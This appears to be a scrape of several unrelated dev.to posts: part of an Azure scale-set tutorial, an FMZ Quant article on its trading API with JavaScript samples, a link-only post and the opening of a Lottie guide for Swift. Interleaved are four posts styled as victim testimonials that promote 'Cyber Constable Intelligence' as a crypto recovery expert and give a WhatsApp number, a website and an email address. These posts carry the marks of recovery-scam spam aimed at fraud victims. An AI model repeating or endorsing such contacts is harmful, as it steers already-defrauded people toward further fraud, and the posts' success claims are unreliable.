balancing, select the Use a load balancer checkbox to put the scale set instances behind a load balancer. - In Load balancing options, select Azure load balancer. - In Select a load balancer, select a load balancer or create a new one. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y0db87klio939wp5kzjc.PNG) - For Select a backend pool, select Create new, type myBackendPool, then select Create. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zabfhmoqy69wv1z93n2s.PNG) Select Next: Scaling to move to the scaling configurations. On the Scaling page, set the initial instance count field to 5. You can set this number up to 1000. For the Scaling policy, selete custom autoscale ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/jdgdw9t9v7xrdfwkh68q.PNG) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s40hzp1hzcye3qtp7l0b.PNG) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/iark0pgpyc702j16rbtr.PNG) - When you're done, select Review + create. After it passes validation, select Create to deploy the scale set. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/spvg0an48xn5xjb5rjqx.PNG) ## Clean Up Resources **Delete Resource** When no longer needed, you can delete the resource group, virtual machine, and all related resources. - On the Overview page for the VM, select the Resource group link - At the top of the page for the resource group, select Delete resource group. - A page will open warning you that you are about to delete resources. Type the name of the resource group and select Delete to finish deleting the resources and the resource group
emeka_moses_c752f2bdde061
1,912,136
MOST GENUINE BITCOIN,USDT,CRYPTO RECOVERY EXPERT CONTACT CYBER CONSTABLE INTELLIGENCE
In the digital age, where opportunities and risks coexist in equal measure, CYBER CONSTABLE...
0
2024-07-05T02:19:29
https://dev.to/alison_molloy_d99104ab8b6/most-genuine-bitcoinusdtcrypto-recovery-expert-contact-cyber-constable-intelligence-387c
webdev, programming, react, tutorial
In the digital age, where opportunities and risks coexist in equal measure, CYBER CONSTABLE INTELLIGENCE emerges as a guiding force, offering solace and support to those who fall by the intricate web of online scams and frauds. Their name carries weight, synonymous with reliability and resilience in the face of adversityThe recounted tale of financial ruin serves as a poignant reminder of the pervasive threats that loom in the virtual realm. Amidst the chaos, CYBER CONSTABLE INTELLIGENCE stands tall, a beacon of support for those navigating the murky waters of cybercrime. Theirs is a mission defined by unwavering dedication and unwavering resolve, a testament to their commitment to safeguarding the interests of their clients. What distinguishes CYBER CONSTABLE INTELLIGENCE is its unwavering commitment to transparency and accountability. Rooted in a foundation of trust, they approach each case with meticulous care and attention to detail. Theirs is a journey guided by integrity, where the pursuit of justice takes precedence above all else. In the case under scrutiny, CYBER CONSTABLE INTELLIGENCE response was nothing short of remarkable. Armed with a wealth of knowledge and expertise in cybercrime intervention, they embarked on a journey to reclaim what was rightfully theirs. Theirs was a mission defined by precision and determination, a testament to their unwavering commitment to their client's well-being. The road to recovery was fraught with challenges, yet CYBER CONSTABLE INTELLIGENCE navigated it with poise and resilience. Through careful investigation and strategic intervention, they successfully reclaimed every penny of the staggering 10.06 BTC unlawfully seized from the victim. Their triumph was not merely financial but symbolic, a testament to the indomitable spirit of those who refuse to be cowed by adversity. But CYBER CONSTABLE INTELLIGENCE impact extends far beyond mere restitution. By empowering individuals to reclaim their autonomy and security in the digital realm, they sow the seeds of resilience and fortitude. Their unwavering dedication to their client's well-being serves as a beacon of hope in an otherwise uncertain world. This testimonial stands as a testament to the efficacy of CYBER CONSTABLE INTELLIGENCE services. It is a testament to their integrity and unwavering commitment to justice. In a world rife with uncertainty, they stand as a bastion of stability, offering a lifeline to those in need. As we traverse the ever-evolving landscape of cyberspace, CYBER CONSTABLE INTELLIGENCE stands as a steadfast ally, ready to confront the challenges that lie ahead. Their expertise in cybercrime intervention is unparalleled, providing individuals with the reassurance that they are not alone in their fight against online fraudsters. CYBER CONSTABLE INTELLIGENCE is not just a service provider; they are experts for those who have been victimized by online scams and fraud. With their unwavering commitment to justice and integrity, they offer a glimmer of hope amidst the chaos of the digital world. As we continue to navigate the complexities of the digital age, CYBER CONSTABLE INTELLIGENCE stands as a steadfast ally, guiding us toward a safer and more secure prospect. Clink on the link below: WhatsApp info: +1 (252) 378-7611 Website info: https://cyberconstableintelligence. com Email info: support@cyberconstableintelligence. com
alison_molloy_d99104ab8b6
1,912,135
Modularization concept idea
Source: https://www.modularmanagement.com/blog/all-you-need-to-know-about-modularization
0
2024-07-05T02:18:57
https://dev.to/aspsptyd/modularization-concept-idea-fi5
mobdev
Source: https://www.modularmanagement.com/blog/all-you-need-to-know-about-modularization ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ag2ao6r44uobyjstbnjz.png)
aspsptyd
1,912,134
Detailed Explanation of FMZ Quant API Upgrade: Improving the Strategy Design Experience
Preface After 9 years of technical iteration, the FMZ Quant Trading Platform has been...
0
2024-07-05T02:17:45
https://dev.to/fmzquant/detailed-explanation-of-fmz-quant-api-upgrade-improving-the-strategy-design-experience-4onm
fmzquant, api, trading, strategy
## Preface After 9 years of technical iteration, the FMZ Quant Trading Platform has been reconstructed many times, although as users we may not have noticed it. In the past two years, the platform has made a lot of optimizations and upgrades in terms of user experience, including a comprehensive upgrade of the UI interface, enrichment of commonly used quantitative trading tools, and the addition of more backtesting data support. In order to make strategy design more convenient, trading logic clearer, and easier for beginners to get started, the platform has upgraded the API interface used by the strategy. Dockers using the latest version can enable these new features. The platform is still compatible with the old interface calls to the greatest extent. Information about the new features of the API interface has been updated to the API documentation of the FMZ Quant Trading Platform: Syntax Guide: https://www.fmz.com/syntax-guide User Guide: https://www.fmz.com/user-guide So let's take a quick look at which interfaces have been upgraded and what changes are needed to use old strategies to make them compatible with the current API. ## 1. New API interface ### Added exchange.GetTickers function For designing multi-product strategies and full market monitoring strategies, the aggregated market interface is essential. In order to make the strategy easier to develop and avoid reinventing events, the FMZ Quant Trading Platform encapsulates this type of exchange API. If the exchange does not have this interface (individual exchanges), when calling exchange.GetTickers(), an error message is displayed: Not supported. This function does not have any parameters and it will return the real-time market data of all varieties in the exchange's aggregated market interface. It can be simply understood as: exchange.GetTickers() function is the full-featured request version of the exchange.GetTicker() function (look carefully, the difference between these two function names is just the singular and plural). We use the OKX spot simulation environment for testing: ``` function main() { exchange.IO("simulate", true) var tickers = exchange.GetTickers() if (!tickers) { throw "tickers error" } var tbl = {type: "table", title: "test tickers", cols: ["Symbol", "High", "Open", "Low", "Last", "Buy", "Sell", "Time", "Volume"], rows: []} for (var i in tickers) { var ticker = tickers[i] tbl.rows.push([ticker.Symbol, ticker.High, ticker.Open, ticker.Low, ticker.Last, ticker.Buy, ticker.Sell, ticker.Time, ticker.Volume]) } LogStatus("`" + JSON.stringify(tbl) + "`") return tickers.length } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i7ljx9wiae75yru18kuk.png) ### Added exchange.CreateOrder function The newly added exchange.CreateOrder() function is the focus of this upgrade. The biggest function of exchange.CreateOrder() is to specify the type and direction of the order in the function parameters directly. In this way, it no longer depends on the current trading pair, contract code, trading direction and other settings of the system. In multi-species trading order placement scenarios and concurrent scenarios , the design complexity is greatly reduced. The four parameters of the exchange.CreateOrder() function are symbol, side, price, amount. Test using OKX futures simulation environment: ``` function main() { exchange.IO("simulate", true) var id1 = exchange.CreateOrder("ETH_USDT.swap", "buy", 3300, 1) var id2 = exchange.CreateOrder("BTC_USDC.swap", "closebuy", 70000, 1) var id3 = exchange.CreateOrder("LTC_USDT.swap", "sell", 110, 1) Log("id1:", id1, ", id2:", id2, ", id3:", id3) } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6kx7k2u3xceg7l9ye2ni.png) In this way, only three exchange.CreateOrder() function calls were used to place three futures orders of different varieties and directions. ### Added exchange.GetHistoryOrders function The newly added exchange.GetHistoryOrders() function is used to obtain the historical transaction orders of a certain variety. The function also requires the support of the exchange interface. For querying historical orders, the interfaces implemented by various exchanges vary greatly: - Some support paginated queries, while others do not; - Some exchanges have a query window period, that is, orders older than N days cannot be queried; - Most exchanges support querying at a specified time, but some do not; Such interfaces are encapsulated with the highest degree of compatibility, and in actual use, attention should be paid to whether they meet the requirements and expectations of the strategy. The detailed function description is not repeated here, you can refer to the syntax manual in the API documentation: > https://www.fmz.com/syntax-guide#fun_exchange.gethistoryorders Tested using the Binance spot trading environment: ``` function main() { var orders = exchange.GetHistoryOrders("ETH_USDT") // Write to chart var tbl = {type: "table", title: "test GetHistoryOrders", cols: ["Symbol", "Id", "Price", "Amount", "DealAmount", "AvgPrice", "Status", "Type", "Offset", "ContractType"], rows: []} for (var order of orders) { tbl.rows.push([order.Symbol, order.Id, order.Price, order.Amount, order.DealAmount, order.AvgPrice, order.Status, order.Type, order.Offset, order.ContractType]) } LogStatus("orders.length:", orders.length, "\n", "`" + JSON.stringify(tbl) + "`") } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/djg368adgc84cawq9s2q.png) ### Added exchange.GetPositions function The old version of the position data acquisition function is exchange.GetPosition(). This upgrade adds a new position acquisition function to better match the function naming semantics: exchange.GetPositions(). At the same time, it is still compatible/upgraded with the GetPosition function. The exchange.GetPositions() function has three calling forms: - exchange.GetPositions() When no parameters are passed, position data is requested based on the current trading pair/contract code settings. - exchange.GetPositions("ETH_USDT.swap") When specifying specific product information (the format of ETH_USDT.swap is defined by the FMZ platform), request the position data of the specific product. - exchange.GetPositions("") Request the exchange position interface to obtain all the current dimension of the position data. (Divided according to the exchange interface product dimension) Test using OKX futures simulation environment: ``` function main() { exchange.IO("simulate", true) exchange.SetCurrency("BTC_USDT") exchange.SetContractType("swap") var p1 = exchange.GetPositions() var p2 = exchange.GetPositions("") var tbls = [] for (var positions of [p1, p2]) { var tbl = {type: "table", title: "test GetPosition/GetPositions", cols: ["Symbol", "Amount", "Price", "FrozenAmount", "Type", "Profit", "Margin", "ContractType", "MarginLevel"], rows: []} for (var p of positions) { tbl.rows.push([p.Symbol, p.Amount, p.Price, p.FrozenAmount, p.Type, p.Profit, p.Margin, p.ContractType, p.MarginLevel]) } tbls.push(tbl) } LogStatus("`" + JSON.stringify(tbls) + "`") } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fb9j5rew3oqbnaokc0gb.png) When the parameter passed to the exchange.GetPositions() function is ETH_USDT.swap, the position data of ETH's U-based perpetual contract can be obtained. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vi5hb6sv373rzu1sjmiq.png) When the parameter passed to the exchange.GetPositions() function is an empty string "", the position data of all U-based contracts can be obtained. Isn't it convenient? ## 2. API Interface Upgrade ### Update exchange.GetTicker function The main upgrade of the market function exchange.GetTicker() is to add the symbol parameter. This allows the function to request market data directly according to the product information specified by the parameter without the current trading pair and contract code. It simplifies the code writing process. At the same time, it is still compatible with the call method without passing parameters, and is compatible with the old platform strategy to the greatest extent. The parameter symbol has different formats for spot/futures for the exchange object exchange: - Spot exchange object The format is: AAA_BBB, AAA represents baseCurrency, i.e. trading currency, and BBB represents quoteCurrency, i.e. pricing currency. Currency names are all in uppercase letters. For example: BTC_USDT spot trading pair. - Futures exchange object The format is: AAA_BBB.XXX, AAA represents baseCurrency, i.e. trading currency, BBB represents quoteCurrency, i.e. pricing currency, and XXX represents contract code, such as perpetual contract swap. Currency names are all in uppercase letters, and contract codes are in lowercase. For example: BTC_USDT.swap, BTC's U-based perpetual contract. Tested using the Binance Futures live environment: ``` var symbols = ["BTC_USDT.swap", "BTC_USDT.quarter", "BTC_USD.swap", "BTC_USD.next_quarter", "ETH_USDT.swap"] function main() { exchange.SetCurrency("ETH_USD") exchange.SetContractType("swap") var arr = [] var t = exchange.GetTicker() arr.push(t) for (var symbol of symbols) { var ticker = exchange.GetTicker(symbol) arr.push(ticker) } var tbl = {type: "table", title: "test GetTicker", cols: ["Symbol", "High", "Open", "Low", "Last", "Buy", "Sell", "Time", "Volume"], rows: []} for (var ticker of arr) { tbl.rows.push([ticker.Symbol, ticker.High, ticker.Open, ticker.Low, ticker.Last, ticker.Buy, ticker.Sell, ticker.Time, ticker.Volume]) } LogStatus("`" + JSON.stringify(tbl) + "`") return arr } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0gousoblpku7fwrlj6b1.png) Requesting a batch of market data for a specified symbol has become much simpler. ### Update exchange.GetDepth function Similar to the GetTicker function, the exchange.GetDepth() function also adds a symbol parameter. This allows us to directly specify the symbol when requesting depth data. Tested using the Binance Futures live environment: ``` function main() { exchange.SetCurrency("LTC_USD") exchange.SetContractType("swap") Log(exchange.GetDepth()) Log(exchange.GetDepth("ETH_USDT.quarter")) Log(exchange.GetDepth("BTC_USD.swap")) } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hylg6tlhjb9snb2jhijc.png) ### Update exchange.GetTrades function Similar to the GetTicker function, the exchange.GetTrades() function also adds a symbol parameter. This allows us to specify the symbol directly when requesting market transaction data. Tested using the Binance Futures live environment: ``` function main() { var arr = [] var arrR = [] var symbols = ["LTC_USDT.swap", "ETH_USDT.quarter", "BTC_USD.swap"] for (var symbol of symbols) { var r = exchange.Go("GetTrades", symbol) arrR.push(r) } for (var r of arrR) { arr.push(r.wait()) } var tbls = [] for (var i = 0; i < arr.length; i++) { var trades = arr[i] var symbol = symbols[i] var tbl = {type: "table", title: symbol, cols: ["Time", "Amount", "Price", "Type", "Id"], rows: []} for (var trade of trades) { tbl.rows.push([trade.Time, trade.Amount, trade.Price, trade.Type, trade.Id]) } tbls.push(tbl) } LogStatus("`" + JSON.stringify(tbls) + "`") } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2i7jrnjlk61qxggpl43v.png) This upgrade is also compatible with the symbol parameter specified by the exchange.Go() function when calling the platform API interface concurrently. ### Update exchange.GetRecords function The GetRecords function has been greatly adjusted this time. In addition to supporting the symbol parameter to directly specify the type information of the requested K-line data, the original period parameter is retained to specify the K-line period, and a limit parameter is added to specify the expected K-line length when requesting. At the same time, it is also compatible with the old version of the GetRecords function that only passes in the period parameter. The calling method of exchange.GetRecords() function is: - exchange.GetRecords() If no parameters are specified, the K-line data of the product corresponding to the current trading pair/contract code is requested. The K-line period is the default K-line period set in the strategy backtesting interface or in live trading. - exchange.GetRecords(60 * 15) When only the K-line period parameter is specified, the K-line data of the product corresponding to the current trading pair/contract code is requested. - exchange.GetRecords("BTC_USDT.swap") When only the product information is specified, the K-line data of the specified product is requested. The K-line period is the default K-line period set in the strategy backtesting interface or in live trading. - exchange.GetRecords("BTC_USDT.swap", 60 * 60) Specify the product information and the specific K-line period to request K-line data. - exchange.GetRecords("BTC_USDT.swap", 60, 1000) Specify the product information, specify the specific K-line period, and specify the expected K-line length to request K-line data. Note that when the limit parameter exceeds the maximum length of a single request from the exchange, a paging request will be generated (i.e., multiple calls to the exchange K-line interface). Tested using the Binance Futures live environment: ``` function main() { exchange.SetCurrency("ETH_USDT") exchange.SetContractType("swap") var r1 = exchange.GetRecords() var r2 = exchange.GetRecords(60 * 60) var r3 = exchange.GetRecords("BTC_USDT.swap") var r4 = exchange.GetRecords("BTC_USDT.swap", 60) var r5 = exchange.GetRecords("LTC_USDT.swap", 60, 3000) Log("r1 time difference between adjacent bars:", r1[1].Time - r1[0].Time, "Milliseconds, Bar length:", r1.length) Log("r2 time difference between adjacent bars:", r2[1].Time - r2[0].Time, "Milliseconds, Bar length:", r2.length) Log("r3 time difference between adjacent bars:", r3[1].Time - r3[0].Time, "Milliseconds, Bar length:", r3.length) Log("r4 time difference between adjacent bars:", r4[1].Time - r4[0].Time, "Milliseconds, Bar length:", r4.length) Log("r5 time difference between adjacent bars:", r5[1].Time - r5[0].Time, "Milliseconds, Bar length:", r5.length) } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yc0tpifyn4m3a15zrkj0.png) ### Update exchange.GetOrders function The GetOrders function also adds symbol parameters, which can specify the type of the current unfinished orders (pending orders) directly to be queried; it also supports querying all pending orders (regardless of type); and is compatible with the original calling method. The exchange.GetOrders() function can be called in the following ways: - exchange.GetOrders() Query all uncompleted orders for the current trading pair/contract code. - exchange.GetOrders("BTC_USDT.swap") Query all outstanding orders for USDT-margined perpetual contracts on BTC. - exchange.GetOrders("") Query all unfinished orders in the current dimension of the exchange (divided according to the exchange API interface dimension). Test using OKX futures simulation environment: ``` function main() { exchange.IO("simulate", true) exchange.SetCurrency("BTC_USDT") exchange.SetContractType("swap") // Write to chart var tbls = [] for (var symbol of ["null", "ETH_USDT.swap", ""]) { var tbl = {type: "table", title: symbol, cols: ["Symbol", "Id", "Price", "Amount", "DealAmount", "AvgPrice", "Status", "Type", "Offset", "ContractType"], rows: []} var orders = null if (symbol == "null") { orders = exchange.GetOrders() } else { orders = exchange.GetOrders(symbol) } for (var order of orders) { tbl.rows.push([order.Symbol, order.Id, order.Price, order.Amount, order.DealAmount, order.AvgPrice, order.Status, order.Type, order.Offset, order.ContractType]) } tbls.push(tbl) } LogStatus("`" + JSON.stringify(tbls) + "`") } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ahsipyoonkmgf91o2e4q.png) When no parameters are passed, the default request is for all uncompleted pending orders of the current BTC_USDT trading pair and swap perpetual contract. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/cdd6en3nru2cmy1jld97.png) When the ETH_USDT.swap parameter is specified, all outstanding pending orders of the perpetual contract of the ETH_USDT trading pair are requested. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tqbsr478v311d7oivljj.png) When an empty string "" is passed, all uncompleted orders of all USDT-margined contracts are requested. ### Update exchange.GetPosition function It is still compatible with the old position acquisition function naming, and also adds the symbol parameter, which can specify the type information of the specific requested position data. The usage of this function is exactly the same as exchange.GetPositions(). ### Update exchange.IO function For exchange.IO("api", ...) function calls, all exchange objects have been upgraded to support the direct passing of complete request addresses. For example, if you want to call the OKX interface: > // GET https://www.okx.com /api/v5/account/max-withdrawal ccy: BTC Supports direct writing to the base address https://www.okx.com without having to switch the base address first and then call the IO function. Test using OKX futures simulation environment: ``` function main() { exchange.IO("simulate", true) return exchange.IO("api", "GET", "https://www.okx.com/api/v5/account/max-withdrawal", "ccy=BTC") } ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/w4xzimxf2z8fbamvt130.png) ## 3. API Interface Impact ### Affects exchange.GetOrder function This upgrade mainly affects the parameter id of the exchange.GetOrder(id) function. The id parameter is changed from the original exchange order id to a string format containing the trading product. All encapsulated order IDs on the FMZ platform are in this format. For example: - The original order Id of the exchange defined in the exchange order is: 123456 Before this upgrade, if you want to call the GetOrder function, the order Id passed in is 123456. - The product code named by the exchange defined in the exchange order: BTC-USDT. Note that this refers to the trading product code named by the exchange, not the trading pair defined by the FMZ platform. After this upgrade, the format of the parameter id that needs to be passed into the exchange.GetOrder(id) function is adjusted to: BTC-USDT,123456. First, let me explain why this design is done: Because the CreateOrder function has been upgraded to specify the type of order directly (the type of order placed may be different from the currently set trading pair and contract code). If the returned order ID does not contain the type information, then this order ID will be unusable. Because when checking the order, we don't know what type (contract) the order is for. Most exchanges require the specification of parameters describing the type code when checking and canceling orders. How to be compatible with this impact: If you use the exchange.IO function to call the exchange order interface directly to place an order, the return value generally contains the exchange's original symbol (product code) and the original order id. Then concatenating the two with English commas will be the order ID that complies with the definition of the FMZ platform. Similarly, if you use the FMZ platform encapsulated order interface to place an order, since the beginning of the order ID is the trading product code, if you need to use the original order ID, just delete the product code and comma. ### Affects exchange.CancelOrder function The impact of this upgrade on the exchange.CancelOrder() function is the same as the exchange.GetOrder() function. ### Affects exchange.Buy function The impact of this upgrade on the exchange.Buy() function is the same as the exchange.GetOrder() function. The order ID returned by the exchange.Buy() function is a new structure, for example, the ID returned when placing a futures order on the OKX exchange is: LTC-USDT-SWAP,1578360858053058560. ### Affects exchange.Sell function The impact of this upgrade on the exchange.Sell() function is the same as the exchange.GetOrder() function. The order ID returned by the exchange.Sell() function is a new structure, for example, the ID returned when placing a futures order on the OKX exchange is: ETH-USDT-SWAP,1578360832820125696. ## 4. Structural Adjustment ### Ticker Structure This update adds a Symbol field to the Ticker structure, which records the market information of the current Ticker structure. The format of this field is exactly the same as the symbol parameter format of the exchange.GetTicker() function. ### Order Structure This update adds a Symbol field to the Order structure, and the format of this field is exactly the same as the symbol parameter format of the exchange.GetTicker() function. This update also modifies the Id field of the Order structure, recording the product information and original order information in the new order ID format. Refer to the description of the order ID in the exchange.GetOrder() function, which will not be repeated here. ### Position Structure This update adds a Symbol field to the Position structure. The format of this field is exactly the same as the symbol parameter format of the exchange.GetTicker() function. ## 5. Backtesting system In order to meet user needs, this upgrade will first be compatible with the live trading, and the backtesting system will be adapted within a week. If individual strategy codes are affected, please follow the instructions in this article to make changes and adaptations. From: https://www.fmz.com/bbs-topic/10456
fmzquant
1,911,097
Easy implement lottie animation in Swift
Have you heard about Lottie? Lottie is an open-source animation library created by Airbnb, and it’s a...
0
2024-07-05T02:16:46
https://dev.to/omerta_rom/easy-implement-lottie-animation-in-swift-30oi
swift, ios
Have you heard about Lottie? Lottie is an open-source animation library created by Airbnb, and it’s a game-changer for adding high-quality animations to your app. Whether you want to provide visual feedback, add some personality, or simply make your app more engaging, Lottie has got you covered. Here's the image below is an example of lottie animation asset. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0h0am77art463wk7i59v.gif) In this guide, I'll walk you through how to sprinkle some Lottie magic into your Swift project. First step all you need to do is import Lottie library for iOS development. You can download the library from the github link below. https://github.com/airbnb/lottie-ios You can pull the Lottie Github Repo and include the Lottie.xcodeproj to build a dynamic or static library. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/n5p1wykqoz4t0iklzefl.png)
omerta_rom
1,912,133
TRUSTED CRYPTOCURRENCY AND ETH/USDT RECOVERY EXPERT CONSULT CYBER CONSTABLE INTELLIGENCE
I write this with a heavy heart and a sense of responsibility, hoping to spare others from the...
0
2024-07-05T02:13:48
https://dev.to/russell_howard_ecc03a6cb5/trusted-cryptocurrency-and-ethusdt-recovery-expert-consult-cyber-constable-intelligence-5a6c
I write this with a heavy heart and a sense of responsibility, hoping to spare others from the anguish and financial devastation I endured at the hands of a deceitful brokerage firm. For four long years, I entrusted my hard-earned savings and aspirations for financial security to this company, only to be manipulated and ultimately betrayed. It all began with what seemed like a promising opportunity in online trading. The allure of potential profits and the promise of expert guidance drew me in, and I began my journey with optimism and cautious enthusiasm. However, as time passed, I began to notice unsettling patterns. My assigned account manager, entrusted with guiding my investments, consistently steered me towards trades that ended in substantial losses. Initially, I attributed these setbacks to market volatility and the inherent risks of trading. Yet, upon closer scrutiny and painful realization, I discovered the truth—I was being manipulated for the benefit of my account manager and the company. Each loss I incurred translated into gains for them, amplifying their profits at my expense. Despite these revelations, I persisted, hoping that prudent decision-making and diligence would eventually turn the tide in my favor. The turning point came when, after making a substantial deposit of £120,000, my account was summarily closed, and all avenues for withdrawal were abruptly restricted. It was a devastating blow, compounded by the callousness of losing my entire fortune during the global pandemic—a time already fraught with uncertainty and hardship. The sense of betrayal and helplessness was profound, prompting me to seek recourse and justice. In my desperate search for answers and restitution, I fortuitously stumbled upon Cyber Constable Intelligence—an organization specializing in recovering funds from deceitful brokers and financial fraudsters. Skeptical yet hopeful, I reached out to them, recounting my harrowing ordeal and the egregious actions of the brokerage firm that had shattered my financial stability. Cyber Constable Intelligence distinguished themselves with professionalism, empathy, and a steadfast commitment to righting the wrongs inflicted upon me. They listened attentively to my story, providing solace and reassurance amidst the turmoil. Their team of experts, equipped with profound expertise in financial fraud investigation and digital forensics, meticulously analyzed my case. Cyber Constable Intelligence embarked on a rigorous investigation, leveraging advanced technological tools and their extensive network of resources to trace the convoluted path of my funds. They unraveled the intricate web of deception woven by the brokerage firm, compiling irrefutable evidence to substantiate my claims and support legal action if necessary. Throughout the process, they maintained transparent communication, keeping me informed of their progress and guiding me through each step of the recovery journey. In a testament to their expertise and unwavering dedication, Cyber Constable Intelligence succeeded in recovering a significant portion of my lost funds. The return of these funds was not merely a financial relief but a triumph of justice over deceit—a beacon of hope amidst the darkness of financial exploitation. Thanks Cyber Constable Intelligence for their tireless advocacy and unwavering support. They not only restored my financial security but also empowered me to expose the deceptive practices of the brokerage firm, aiming to prevent others from falling victim to similar schemes. I urge anyone navigating the treacherous waters of online trading to exercise caution and vigilance. Trustworthy allies like Cyber Constable Intelligence stand ready to assist those who have been wronged by fraudulent practices. If you find yourself entangled in a similar predicament—betrayed by false promises and grappling with substantial losses—do not hesitate to seek their guidance and expertise. Cyber Constable Intelligence embodies integrity, resilience, and a steadfast commitment to client welfare—a beacon of hope for those seeking restitution and justice in the digital age. Contact Cyber Constable Intelligence today and take the first step towards reclaiming your financial security and peace of mind. Your story deserves to be heard, and your rights deserve to be upheld. Get in touch with the info below: WhatsApp info: +1 (252) 378-7611 Website info: https://cyberconstableintelligence. com Email info: (support(@)cyberconstableintelligence). com
russell_howard_ecc03a6cb5
1,912,131
BEST CRYPTOCURRENCY RECOVERY EXPERT CONTACT CYBER CONSTABLE INTELLIGENCE
Experiencing a significant financial loss due to falling prey to a fraudulent scheme can be a deeply...
0
2024-07-05T02:06:22
https://dev.to/becky_lawhon_9898910d0431/best-cryptocurrency-recovery-expert-contact-cyber-constable-intelligence-3905
webdev, javascript, programming, tutorial
Experiencing a significant financial loss due to falling prey to a fraudulent scheme can be a deeply distressing and demoralizing ordeal. I found myself in this unfortunate situation after being lured in by the false promises of a platform called vipfx.com, which claimed to offer substantial returns on Bitcoin investments. Introduced to this platform by a friend, I naively trusted their recommendations without conducting thorough research, leading to a substantial loss of funds and a prolonged period of despair. Fortunately, my fortunes took a positive turn when I was introduced to Cyber Constable Intelligence, a reputable company specializing in recovering assets lost to financial fraud. With the expert assistance of their team, I was able to navigate the complex process of reclaiming my stolen Bitcoin with remarkable efficiency and success. The support and guidance provided by Cyber Constable Intelligence were attentive, compassionate, and dedicated to helping me recover my bitcoins. One aspect that stood out during my experience with Cyber Constable Intelligence was their swift and effective handling of my case. Within a short span of two weeks, they managed to successfully retrieve my stolen BTC from the perpetrators behind the vipfx.com scam. Their prompt action to deliver results without unnecessary delays or complications was truly commendable. This rapid resolution not only alleviated the financial burden I was facing but also provided a sense of closure and justice. Throughout the recovery process, Cyber Constable Intelligence demonstrated a high level of expertise that inspired trust and confidence. They maintained clear communication, providing regular updates on the progress of my case and addressing any queries or concerns I had with transparency and clarity. Their proactive efforts to keep me informed and supported throughout the ordeal were truly reassuring and underscored their dedication to client satisfaction. In addition to its recovery services, Cyber Constable Intelligence also offers invaluable advice on safeguarding against future scams and protecting one's financial assets. Their proactive approach to educating clients on best practices for preventing financial fraud highlighted their commitment to not only recovering funds but also preventing future victimization. This proactive stance sets Cyber Constable Intelligence apart as a reliable partner in navigating the complexities of financial recovery. I endorse Cyber Constable Intelligence to anyone who has fallen victim to financial fraud or is at risk of doing so. Their dedication to their clients makes them a beacon of hope in the aftermath of fraudulent incidents. My tale with them has been transformative, and I am immensely grateful for their pivotal role in helping me regain my stolen funds and peace of mind. If you find yourself in a similar situation, do not hesitate to seek assistance from Cyber Constable Intelligence – they are truly a lifeline in times of financial distress. Reach out to them with the information below: WhatsApp info: +1 ( 2 5 2 ) 3 7 8- 7 6 1 1 Website info: https://cyberconstableintelligence… com) Email info: (support(@)cyberconstableintelligence).  com)
becky_lawhon_9898910d0431
1,912,130
HIRING THE BEST BITCOIN RECOVERY EXPERT FROM CYBER CONSTABLE INTELLIGENCE
WhatsApp info: +1 ( 252 ) 378- 7611 Website info: https://cyberconstableintelligence… com) Email...
0
2024-07-05T02:00:19
https://dev.to/mary_joyce_8aff0cb5c2b5f2/hiring-the-best-bitcoin-recovery-expert-from-cyber-constable-intelligence-1i3h
blockchain, bitcoin, hiring, programming
WhatsApp info: +1 ( 252 ) 378- 7611 Website info: https://cyberconstableintelligence… com) Email info: (support(@)cyberconstableintelligence).  com) Just a mere month ago, I found myself teetering on the precipice of financial disaster, all thanks to an ill-fated decision to invest my hard-earned £5000 with a crypto investment company I stumbled upon on Telegram. The promises were grandiose, the returns seemingly too good to be true. And, as it turned out, they were indeed too good to be true. The individual behind the screen painted a mesmerizing picture of success, luring me in with the allure of high returns and quick profits. Naive and hopeful, I took the plunge, depositing my savings into their platform with dreams of financial freedom dancing in my mind. However, the dream quickly soured into a nightmare when I attempted to withdraw my initial investment. Despite seeing the purported amount displayed tantalizingly on the dashboard, access to my funds was inexplicably barred. Panic set in as I realized I had fallen victim to a meticulously crafted scam. The realization hit me like a freight train. I was on the brink of bankruptcy, my hard-earned money seemingly evaporating into thin air. Feelings of helplessness and despair engulfed me as I grappled with the harsh reality of my situation. Just when I was about to succumb to despair, a ray of hope pierced through the darkness in the form of an article I stumbled upon on Medium. It spoke of a company by the name of Cyber Constable Intelligence, claiming to specialize in recovering funds lost to online scams. Skeptical yet desperate, I decided to reach out to them, clinging to the sliver of hope they offered. To my astonishment and immense relief, Cyber Constable Intelligence lived up to its lofty reputation. With unparalleled expertise and professionalism, they swiftly embarked on the arduous task of retrieving my lost funds. Within a mere week, they had succeeded where I had thought all hope was lost—they helped me recover my £5000. Words cannot express the overwhelming sense of gratitude and relief I felt upon receiving my reclaimed funds. Cyber Constable Intelligence not only salvaged me from the jaws of financial ruin but restored my faith in humanity. Their unwavering dedication and commitment to their clients are a testament to their integrity and reliability. This has taught me invaluable lessons that I will carry with me for a lifetime. I have learned to exercise caution and discernment in my financial endeavors, to tread carefully, and to scrutinize every opportunity that presents itself. No longer will I be swayed by the false promises of strangers peddling dreams of easy wealth. Instead, I vow to approach investments with meticulous care, consulting with financial experts and conducting thorough due diligence before parting ways with my hard-earned money. I understand now, more than ever, the importance of investing only what I can afford to lose and staying vigilant against the ever-looming specter of online scams. To anyone who finds themselves teetering on the edge 